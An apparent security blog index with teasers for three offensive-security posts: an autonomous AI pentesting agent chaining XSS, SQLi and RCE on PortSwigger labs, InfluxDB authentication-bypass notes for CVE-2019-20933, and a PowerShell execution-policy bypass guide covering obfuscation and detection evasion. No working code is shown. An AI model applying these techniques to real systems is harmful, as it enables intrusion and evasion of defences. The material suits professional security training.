Tutorial: Build an AI Penetration Tester with Claude (MCP + Burp) 🤖 Build Your Own AI Penetration Tester: Claude + MCP + Burp Suite A complete step-by-step tutorial to replicate autonomous security testing (25 labs + 2 BSCP exams solved) ⚡ Inspired by "Sonnet Took the Exam. I Just Watched." Originally published on Notion · Tutorial expanded for hands-on replication 🎯 What you'll build: An autonomous AI agent (Claude Sonnet 4.6) that can browse web apps via Playwright, inspect raw HTTP traffic via Burp Suite, and chain XSS → SQLi → RCE to solve PortSwigger labs — completely on its own. 📚 Table of Contents Overview & Architecture Prerequisites & Hardware Step 1: Install Claude Code & MCP Step 2: Configure Playwright MCP Server Step 3: Burp Suite & Burp MCP Integration ...
Read more

InfluxDB TCP 8086 (Default) — Authentication Bypass & Pentest Notes

-
``` Target: InfluxDB (port 8086) Affected versions: < 1.7.6 (CVE-2019-20933) Vulnerability description InfluxDB versions prior to 1.7.6 contain an authentication bypass in the authenticate function in services/httpd/handler.go . A crafted JWT token may contain an empty SharedSecret , allowing an attacker to bypass authentication and perform sensitive actions such as reading internal metrics, modifying data, or executing administrative operations. Risk No formal risk description available in original advisory. Impact depends on exposed instance and data sensitivity. Recommendation Upgrade to influxdb version 1.7.6~rc0-1 or later. Apply vendor-provided patches and restrict access to port 8086 with network controls. References Exploit: LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 CVE-2019-20933 — MITRE NVD — CVE-2019-20933 InfluxData patch commit Exploitation ...
Read more

Mastering PowerShell Execution Policy Bypass

-
📋 Table of Contents 1. Introduction to PowerShell Execution Policies 2. Understanding Execution Policy Mechanisms 3. Basic Bypass Techniques 4. Advanced Bypass Methods 5. PowerShell Script Signing 6. Converting PowerShell to Executables 7. Advanced Obfuscation Techniques 8. Steganographic Delivery Systems 9. Bypassing Reputation-Based Protection 10. Practical Implementation Scenarios 11. Detection Evasion Strategies 12. Conclusion and Best Practices 🔒 Introduction to PowerShell Execution Policies This guide is used in professional penetration testing training and aligns with MITR...
Read more